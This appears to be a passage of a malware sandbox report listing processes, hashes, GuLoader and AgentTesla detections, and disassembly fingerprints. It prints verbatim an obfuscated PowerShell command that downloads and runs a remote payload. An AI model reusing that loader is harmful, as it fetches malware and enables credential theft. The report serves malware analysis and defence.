                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:08:03:48
                                              Start date:23/04/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Luminescences.ska && echo $"
                                              Imagebase:0x7ff63d840000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:08:03:54
                                              Start date:23/04/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasSt.lavulselrsvippkKoder. KyllDOpry o F,brw evisnStemmlEvapooCenteaJob udobfusFBohavi Melkl amseepunkt(Su.pr$ UsliFFremmo ortrJagttuI depnViderdAnensebathon OphodPreapeBaddesParti7Ra,df9Caust,Un.us$va teUSkrppdDe aif Del aKvat.k Skllt nor uWh,lar Svine.aporrTectoeAngaksSttt.) agis ';$Prostatectomy=$Femogtyvende[1]+$Prostatectomy;$Udfaktureres=$Femogtyvende[0];Halvkusinen (Posthoc168 'For,t$SodavgSincelHealdoM.rmebB arbaDevoclTrans:ExitiPCurieaRrpospModvipbagtaeL.courDiasts Mome=Glets( Ma,oT ,iree,uculs .epitMikro-Ve.zePBelloaAnamnt stroh P.ly Bur $ForstUBevged Abjuf P.shaMam.lkStepptHastiuPolicr Bl,deKvabtr IkoneT,ykssDelpr)Bulim ');while (!$Pappers) {Halvkusinen (Posthoc168 'Explo$U,congRecomlResheoForpabWitheaWakfblShaik:FniseASlutsdDr,err StaviKo.fraSyfiltGr sei Mcnac St,i=Vexat$Bowlit .utcrnjereuA,steeRefor ') ;Halvkusinen $Prostatectomy;Halvkusinen (Posthoc168 ' OutpShjisotTrineaPrionrTranstxanth-StearSFootllOplage.ubcoeYd,evpWorl R neb4Autom ');Halvkusinen (Posthoc168 'Yuruc$NonchgKar elGjaldo yvabskaglaBil.ylMatte:SphegP spanaUddykpInfr,pnegate t,nkrFeriesB.nkr=Koffa(MolteTBa,kaeUnsp.sMinuttGryl -AdsorPSubtia enlt JagthMurst Vands$SolbaUoctard,oilefRotatablnddkFigent,accau MisarIberie edurStoreeLiv.fsUnplu)Yorks ') ;Halvkusinen (Posthoc168 'Petey$ G,nngSknsalT,llgo Lewdb ForeaeraselTag i:Ga.glCOveraoMul,iiFo fasMisdat in ir Jug.eSkppelGaransmedic=Undis$MarmigOvermlFlankoForudb mus,a.eserlChief:RefleS.egynkFllesrdsiockForhaiFede.n Nonpd KrsejKl jna Bu.sgG.rmae OpernSkenddNimsheButik+Salth+ ragt%Aroma$BeretTAalbor LinieInt.rdJuleseLambelGla,etI,dekeOriensOrang2Tense0 Tyro.BevikcTelefoKurveuCo,pun ReprtUbeha ') ;$Forundendes79=$Tredeltes20[$Coistrels];}Halvkusinen (Posthoc168 'Tim.r$ ErhvgFaarelWepmaoSpo.ibdamp.aVand lParag:.nchhE.ndesgTa.leo perstSmaadrRevoliAfskepTrumfpBea ueBadedrUndernFor beT emi7 Ta t4Stric ,verv=insou Frs,G SmrbeDamprtLa.kn-underC,isiooSmeltn Verst AceteSculpnSjleat d,ct Tilsy$M.nsuUCoel.d depofEscudaSaddlkKa yotRituauFrostr IndeeCykelrMofuseOplyssGeote ');Halvkusinen (Posthoc168 'N.nag$ExpelgDriftlBejaboEnajibHelteaHovedl Spec:OvertU KbesnBagdel,illiaGingeb Trucoe rovrDef.naPostibAb eslEkstre P.el B.ann= Chel Rusf[Ulv,mSSelskyKngtesAlbantPynteeSivebm Egot.FraseCS midoColomnSybilvOmraaeGonorrHochet Int ]Spytk:Humor:Evoc.F egimr.astroBesvrmKasseBenkelaSkaktsNordieLgg,r6Tu,en4BortfSOpalitMesmer langi DilanThromgFolke( Thym$Om,ryENoneqg Te.eoSyn,etUngerrBrakeiMastopAsbespBttefeArbejrAlbugnBouileRhy,o7 Mote4Sp,ba) Traa ');Halvkusinen (Posthoc168 ' Tilb$Mi,jbgMartelDustpoBekenb,peraaMeratlRiffe:P enoGOuthueRegnmmLika,iTitantNonreoGobblrCykeliKvderaFo,holOr.er St,er=Lnmo. Udrug[ ManaSCoalsyA iensp.cistSpinne KravmVestl.Souh TGldsbeScallxDarkitYpper. plauEGennenEftercHyp.koInferdSpi eiStrygnVade.gAnne.]Candi: Lovf: MiniA LyslSSkjolC ,orsIEjakuI Arch.SuperGMorkieDagvrtCruceS.igortSuperr S,eri oastnLootegAnker(It.ne$C angU onflnKashal UnglaTilsab MaaloUdnvnrGuan,aHemlobSolvelSakseeOleog)Blikv ');Halvkusinen (Posthoc168 'Anlac$EkspogConfilGat woBladsbFrdigaTandhlK.ltu:T,dstTD,flur .ropsdeba.kRimesoSpintm Reala .medgEnsafeCh.derBor le El cnOv.rd=Ora.g$CaeciG PseueKan,nmevaneiPreext BadgoThaierSpgeniKultuaOctavlOmlss.,rodusStjgeu ,eribTogl,s Udbytdukk r,depuiBaandnPyromgEuroe(unbeh3 Mont0Vacci3M,deb4Blond2Nesto3 Sneg, unde2Cliff9.stro4Recep2Unsto8 L ve).amme ');Halvkusinen $Trskomageren;"
                                              Imagebase:0xa20000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000A.00000002.2280052237.00000000063C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000A.00000002.2282807652.0000000007520000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.2288203195.00000000096F4000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:08:03:55
                                              Start date:23/04/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Luminescences.ska && echo $"
                                              Imagebase:0x240000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:15
                                              Start time:08:04:27
                                              Start date:23/04/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                              Imagebase:0x990000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2971575193.00000000245EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2971575193.00000000245C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2971575193.00000000245C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000F.00000002.2955442534.0000000003D44000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:false

                                              Disassembly

                                              Reset < >

                                                Executed Functions

                                                Function 00007FFD9B8BB196 Relevance: .5, Instructions: 486COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2638763740.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ffd9b8b0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 36728ec23287b4bf85c391eb5686f90349db0007e6c350cdd6f9cd050af08f7f
                                                • Instruction ID: edce05a320186c3bc8221cfb96d8cd77788de3e10e7bc2f0fe391623634e7ba2
                                                • Opcode Fuzzy Hash: 36728ec23287b4bf85c391eb5686f90349db0007e6c350cdd6f9cd050af08f7f
                                                • Instruction Fuzzy Hash: 4DF1A430A09A4D8FEBA8DF68C8557F937E1FF58310F04427AE85DC7295DB34A9418B82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFD9B8BBF42 Relevance: .5, Instructions: 465COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2638763740.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ffd9b8b0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e2e3d1cdac1ff8bb31d32d79cbde5715b5fe48fe8ed081ad5c200cd2a6341dae
                                                • Instruction ID: 5a72d614b972c3f91da44d85ad9fe279c51ad1779254f9f2cb9bbd74b6b99c97
                                                • Opcode Fuzzy Hash: e2e3d1cdac1ff8bb31d32d79cbde5715b5fe48fe8ed081ad5c200cd2a6341dae
                                                • Instruction Fuzzy Hash: 7AE1B330A09A4E8FEBA8DF68C8657E977D1FF58310F04426AD84DC7295DB74A9418FC1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFD9B984169 Relevance: .5, Instructions: 469COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2640204779.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ffd9b980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ca6e2843e49660a75459946888d188efa81a601edb78c40b098d042a91230a49
                                                • Instruction ID: fcd2fcb419eb015d4488c0450b3a1994db33322db7bbae7aacc1688d8f1245a4
                                                • Opcode Fuzzy Hash: ca6e2843e49660a75459946888d188efa81a601edb78c40b098d042a91230a49
                                                • Instruction Fuzzy Hash: 57E11832A1EE8E5FE7A5DB6848746B87BD1EF55310B0A01BFD05DC72E3DA28A9018741
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFD9B98534D Relevance: .4, Instructions: 370COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2640204779.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ffd9b980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b0db98aad3fe661a101c38f82ff26f81e022d5a4977b891f6c41d44041fa2501
                                                • Instruction ID: 5e950748a6753ec53e26c74da2e14bca140b4e3bf0606fd1c82acfeee46fd28b
                                                • Opcode Fuzzy Hash: b0db98aad3fe661a101c38f82ff26f81e022d5a4977b891f6c41d44041fa2501
                                                • Instruction Fuzzy Hash: 58B14A62B1EF8D1FEBA5DB6C58656B97BE1EF55210B0901FBD04DCB1E3E924AC088341
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFD9B8BC6A0 Relevance: .3, Instructions: 280COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2638763740.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ffd9b8b0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6d16dab974583221d246e09d7c72911fbe12069d2dc770e665fe0d61946fa94d
                                                • Instruction ID: b2b99455772e944c359971629c4f8995f04cebe6c08d214f0b66c5b68a7b163d
                                                • Opcode Fuzzy Hash: 6d16dab974583221d246e09d7c72911fbe12069d2dc770e665fe0d61946fa94d
                                                • Instruction Fuzzy Hash: B3815A3071CA4D4FE798EB6CC494AB5B7D1FF99350B1001BED08AC32A6DA25F842CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFD9B984307 Relevance: .2, Instructions: 156COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2640204779.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ffd9b980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 10d02b3151f266b66239f18f5e058b7019e89f1f3e42e0b0fd8c48d8275395f8
                                                • Instruction ID: c33f9132e7eaeaf623eb02eb23c35d6b7d5b507865c4580641a5f9a98f5f23e5
                                                • Opcode Fuzzy Hash: 10d02b3151f266b66239f18f5e058b7019e89f1f3e42e0b0fd8c48d8275395f8
                                                • Instruction Fuzzy Hash: C551F422F2FECA1FE7A5D76848707B867D1EF51364B5A00BED05DC72E2DE28A9018301
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFD9B985472 Relevance: .1, Instructions: 112COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2640204779.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ffd9b980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 693e29b249dae557a5b2d2bda65443f9974eb4d1ab79f7e02c4ded63a60cc267
                                                • Instruction ID: 3faae733e70225f872f67da642114b5ac8159b2be8f751d113366c246aaced43
                                                • Opcode Fuzzy Hash: 693e29b249dae557a5b2d2bda65443f9974eb4d1ab79f7e02c4ded63a60cc267
                                                • Instruction Fuzzy Hash: BB314852F2FECA1BF7B596A818721B867D1EF50660B4901BAD45DCB0E3ED286C088342
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFD9B8B3945 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2638763740.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ffd9b8b0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                • Instruction ID: e5db7042e3c2c570241a3d3c4700d75eeda254a9a539025d2dfe6e6d04e01e89
                                                • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                • Instruction Fuzzy Hash: 8D01A73020CB0C4FD748EF0CE451AA5B3E0FB89320F10056EE58AC36A1D632E881CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                Function 07D7B74D Relevance: 22.0, Strings: 17, Instructions: 704COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$x.rk$x.rk$x.rk$-rk$-rk
                                                • API String ID: 0-2139633121
                                                • Opcode ID: 4a00f54235452b7f4a8c65ea6732a7a1afdb565d8a8623815a6059e986a0a9f0
                                                • Instruction ID: a4c81a49b9e322aef2c644d17c833bc39a52338a640f53b061fcdebdefda8166
                                                • Opcode Fuzzy Hash: 4a00f54235452b7f4a8c65ea6732a7a1afdb565d8a8623815a6059e986a0a9f0
                                                • Instruction Fuzzy Hash: 4E625EB0A002199FCB24DB54C951BEEBBB2FB84305F5085E9D9096F785CB35AE81CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D72870 Relevance: 15.5, Strings: 12, Instructions: 461COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                • API String ID: 0-745898724
                                                • Opcode ID: aebf6a26849a1d7d52338efa56c327289f8ce64145dcb49fb1c85e7bb04ff09c
                                                • Instruction ID: 4c087e402af4c1417859465d7a923b97775275782fa07859b8c9c889032a5123
                                                • Opcode Fuzzy Hash: aebf6a26849a1d7d52338efa56c327289f8ce64145dcb49fb1c85e7bb04ff09c
                                                • Instruction Fuzzy Hash: 35E128B17043869FCB259E29C8116AAFFB2FFC5311F1884ABD445CB291EB31E945C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D7E0E0 Relevance: 13.0, Strings: 10, Instructions: 534COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$tPdq$tPdq$$dq$$dq$$dq$$dq$$dq$$dq
                                                • API String ID: 0-292338533
                                                • Opcode ID: 23a40eb43f6bcdbcdda29a1cb9a8b7e88a5ddb23220f10cc836a7efc49ac2b7d
                                                • Instruction ID: fe5e163c0c4bfc7a4f2fa6350f5a1d2f519e63b72e096862284b622c28d39472
                                                • Opcode Fuzzy Hash: 23a40eb43f6bcdbcdda29a1cb9a8b7e88a5ddb23220f10cc836a7efc49ac2b7d
                                                • Instruction Fuzzy Hash: 6D12D4B1B00215DFCB24CB68C541AAEFBE2EF89315F6484AAD8059F751EB31DD41CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D75BD0 Relevance: 10.8, Strings: 8, Instructions: 772COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$x.rk$-rk
                                                • API String ID: 0-3882703907
                                                • Opcode ID: 24eae8a1dd36e792eb11eb6fd8a8aa5776d3c9344b19341eb180b316768a09f9
                                                • Instruction ID: 4c5fee0142220f2fe4cfdda43033c1de32998c06addf9ed1adc944c26179a55b
                                                • Opcode Fuzzy Hash: 24eae8a1dd36e792eb11eb6fd8a8aa5776d3c9344b19341eb180b316768a09f9
                                                • Instruction Fuzzy Hash: 5F628FB0A00615DFDB24CB58C941BAAFBF2EF85304F14C5A9D849AB745EB31EC85CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D772E0 Relevance: 10.3, Strings: 8, Instructions: 339COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$x.rk$-rk
                                                • API String ID: 0-3882703907
                                                • Opcode ID: 4ba95f406c3b98f1e3660abbb813a21435c1f8c85e4ce46054f2355219a408a2
                                                • Instruction ID: 8b51cc58d468f427a968dc99c2c9c5f98e7b607125a8d35a1941128bcda9f57f
                                                • Opcode Fuzzy Hash: 4ba95f406c3b98f1e3660abbb813a21435c1f8c85e4ce46054f2355219a408a2
                                                • Instruction Fuzzy Hash: 7ED1BEB0A102059FCB14CBA8C551BAEBBF2ABC9315F64C828D9056F785CB71EC45CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D7624B Relevance: 6.6, Strings: 5, Instructions: 387COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$x.rk$x.rk$-rk
                                                • API String ID: 0-3396866670
                                                • Opcode ID: aa8563b5454bc2fb87a113e96caa7c180c9526567d3e634f1d415960f981a9d8
                                                • Instruction ID: 1ee7a85b891e1265afbb0ec3c4ebb3baaabb180a59c728a3fbd3bbd27759ea83
                                                • Opcode Fuzzy Hash: aa8563b5454bc2fb87a113e96caa7c180c9526567d3e634f1d415960f981a9d8
                                                • Instruction Fuzzy Hash: 8FF1C0B0A002159FDB24DB18C951F6ABBF3AF84304F50C4A9E509AFB95DB31ED81DB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D7BE70 Relevance: 6.6, Strings: 5, Instructions: 363COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$x.rk$x.rk$-rk
                                                • API String ID: 0-3396866670
                                                • Opcode ID: 8adb8ecf4ac43693336efff1ea13ea43a0aeeffa146a09daed3e0d582825ee2e
                                                • Instruction ID: dd3a1a9959f7acf63255f13e05a13b3fda0581b3b88553242688f6cc4026133d
                                                • Opcode Fuzzy Hash: 8adb8ecf4ac43693336efff1ea13ea43a0aeeffa146a09daed3e0d582825ee2e
                                                • Instruction Fuzzy Hash: D7E1A2B0A002199FC724DB68C954BAEBBF2EF84304F1085A9E9095F795CB75ED81CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D772C2 Relevance: 6.5, Strings: 5, Instructions: 268COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq$x.rk$-rk
                                                • API String ID: 0-629053205
                                                • Opcode ID: 3e65c36e0627ae03c19e1e3e5bed1150920014963f1ac9c013d4b0cd9e3eea2f
                                                • Instruction ID: e5bd2ae3e62434b59ef8ecaa65a4f3cd67264cb9f9ba6f3b36647a6c4ca75e15
                                                • Opcode Fuzzy Hash: 3e65c36e0627ae03c19e1e3e5bed1150920014963f1ac9c013d4b0cd9e3eea2f
                                                • Instruction Fuzzy Hash: 03B1ADB0A002059FCB14CB98C540BAEFBF2ABC9318F65C929D9056F795DB35E845CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D74D10 Relevance: 6.0, Strings: 4, Instructions: 1010COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$tPdq$tPdq
                                                • API String ID: 0-980444580
                                                • Opcode ID: f73c4c139249efb012e9085f8254c858c5c6817cbdbb57b2c68ad9b9e799f015
                                                • Instruction ID: 23f05067ef4c674647dac0412a6d7c5712d02f30dab879d34a54594aa9422c40
